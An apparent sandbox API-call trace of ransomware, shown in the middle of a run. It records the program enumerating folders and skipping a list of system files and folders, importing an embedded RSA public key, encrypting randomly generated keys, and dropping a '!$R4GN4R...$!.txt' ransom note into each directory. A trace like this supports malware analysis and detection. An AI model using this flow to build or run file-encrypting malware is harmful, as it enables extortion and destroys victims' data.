[0172.728] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0172.729] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0172.729] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0172.729] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0172.729] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0172.729] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0172.729] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0172.730] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0172.730] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0172.730] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0172.730] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0172.730] GetProcessHeap () returned 0x3520000 [0172.730] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586990 [0172.730] CryptAcquireContextW (in: phProv=0x3586990, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586990*=0x35562a8) returned 1 [0172.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0172.731] GetProcessHeap () returned 0x3520000 [0172.731] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x3589a58 [0172.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x3589a58, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0172.731] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0172.731] GetProcessHeap () returned 0x3520000 [0172.731] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0172.731] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0172.731] GetProcessHeap () returned 0x3520000 [0172.731] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3589a58 | out: hHeap=0x3520000) returned 1 [0172.733] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0172.733] CryptImportPublicKeyInfo (in: hCryptProv=0x35562a8, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x3586994 | out: phKey=0x3586994*=0x3547c00) returned 1 [0172.733] GetProcessHeap () returned 0x3520000 [0172.733] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0172.733] LocalFree (hMem=0x35948f0) returned 0x0 [0172.733] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556330) returned 1 [0172.734] CryptGenRandom (in: hProv=0x3556330, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0172.734] CryptReleaseContext (hProv=0x3556330, dwFlags=0x0) returned 1 [0172.734] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0172.737] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556330) returned 1 [0172.738] CryptGenRandom (in: hProv=0x3556330, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0172.738] CryptReleaseContext (hProv=0x3556330, dwFlags=0x0) returned 1 [0172.738] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0172.741] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35565d8) returned 1 [0172.758] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0172.758] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0172.758] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0172.761] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556660) returned 1 [0172.762] CryptGenRandom (in: hProv=0x3556660, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0172.762] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0172.762] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0172.765] CryptEncrypt (in: hKey=0x3547c00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.766] GetLastError () returned 0x80090016 [0172.766] CryptEncrypt (in: hKey=0x3547c00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.767] GetLastError () returned 0x80090016 [0172.767] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0xa70) returned 0x3f0 [0172.768] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556330) returned 1 [0172.768] CryptGenRandom (in: hProv=0x3556330, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0172.769] CryptReleaseContext (hProv=0x3556330, dwFlags=0x0) returned 1 [0172.769] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0172.771] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556990) returned 1 [0172.772] CryptGenRandom (in: hProv=0x3556990, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0172.772] CryptReleaseContext (hProv=0x3556990, dwFlags=0x0) returned 1 [0172.772] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0172.775] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556bb0) returned 1 [0172.776] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0172.776] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0172.776] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0172.779] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556330) returned 1 [0172.780] CryptGenRandom (in: hProv=0x3556330, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0172.780] CryptReleaseContext (hProv=0x3556330, dwFlags=0x0) returned 1 [0172.780] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0172.783] CryptEncrypt (in: hKey=0x3547c00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.784] GetLastError () returned 0x80090016 [0172.784] CryptEncrypt (in: hKey=0x3547c00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.784] GetLastError () returned 0x80090016 [0172.784] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x58) returned 0x3b4 [0172.785] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3f0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0172.897] GetProcessHeap () returned 0x3520000 [0172.897] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586990 | out: hHeap=0x3520000) returned 1 [0172.897] CloseHandle (hObject=0x3f0) returned 1 [0172.897] GetProcessHeap () returned 0x3520000 [0172.897] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0172.899] CloseHandle (hObject=0x3b4) returned 1 [0172.899] GetProcessHeap () returned 0x3520000 [0172.899] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0172.901] FindClose (in: hFindFile=0x35481c0 | out: hFindFile=0x35481c0) returned 1 [0172.901] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1037", cAlternateFileName="")) returned 1 [0172.902] lstrcmpiW (lpString1="1037", lpString2=".") returned 1 [0172.902] lstrcmpiW (lpString1="1037", lpString2="..") returned 1 [0172.902] lstrcmpiW (lpString1="1037", lpString2="Windows") returned -1 [0172.902] lstrcmpiW (lpString1="1037", lpString2="Windows.old") returned -1 [0172.902] lstrcmpiW (lpString1="1037", lpString2="Tor browser") returned -1 [0172.902] lstrcmpiW (lpString1="1037", lpString2="Internet Explorer") returned -1 [0172.902] lstrcmpiW (lpString1="1037", lpString2="Google") returned -1 [0172.902] lstrcmpiW (lpString1="1037", lpString2="Opera") returned -1 [0172.902] lstrcmpiW (lpString1="1037", lpString2="Opera Software") returned -1 [0172.902] lstrcmpiW (lpString1="1037", lpString2="Mozilla") returned -1 [0172.902] lstrcmpiW (lpString1="1037", lpString2="Mozilla Firefox") returned -1 [0172.902] lstrcmpiW (lpString1="1037", lpString2="$Recycle.Bin") returned 1 [0172.902] lstrcmpiW (lpString1="1037", lpString2="ProgramData") returned -1 [0172.902] lstrcmpiW (lpString1="1037", lpString2="All Users") returned -1 [0172.902] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0172.902] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1037" | out: lpString1="1037") returned="1037" [0172.902] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\" [0172.902] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1037\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\" [0172.903] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\!$R4GN4R_B8CF767A$!.txt" [0172.903] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1037\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0172.910] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*" [0172.910] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.910] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0172.910] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0172.910] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547ec0 [0172.910] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0172.910] FindNextFileW (in: hFindFile=0x3547ec0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf4673d07, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.912] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0172.912] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0172.912] FindNextFileW (in: hFindFile=0x3547ec0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf466eed2, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf466eed2, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0172.912] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0172.912] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0172.912] FindNextFileW (in: hFindFile=0x3547ec0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0172.912] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0172.913] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0172.913] FindNextFileW (in: hFindFile=0x3547ec0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0172.913] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0172.913] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0172.913] FindNextFileW (in: hFindFile=0x3547ec0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0172.913] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0172.913] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0172.913] FindNextFileW (in: hFindFile=0x3547ec0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0172.913] FindClose (in: hFindFile=0x3547ec0 | out: hFindFile=0x3547ec0) returned 1 [0172.915] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547c40 [0172.915] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf4673d07, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf4673d07, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.916] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf466eed2, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf466eed2, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0172.917] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.917] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0172.917] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1037\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0172.917] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0172.917] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0172.917] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1037\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.917] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0172.917] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf") returned=".rtf" [0172.917] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0172.917] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0172.917] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0172.917] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0172.917] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0172.917] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0172.917] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0172.917] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0172.917] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0172.917] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0172.917] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0172.917] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0172.918] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0172.918] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0172.918] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0172.918] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0172.918] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0172.918] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0172.918] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0172.918] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0172.918] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0172.918] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0172.918] GetProcessHeap () returned 0x3520000 [0172.918] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0172.920] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf") 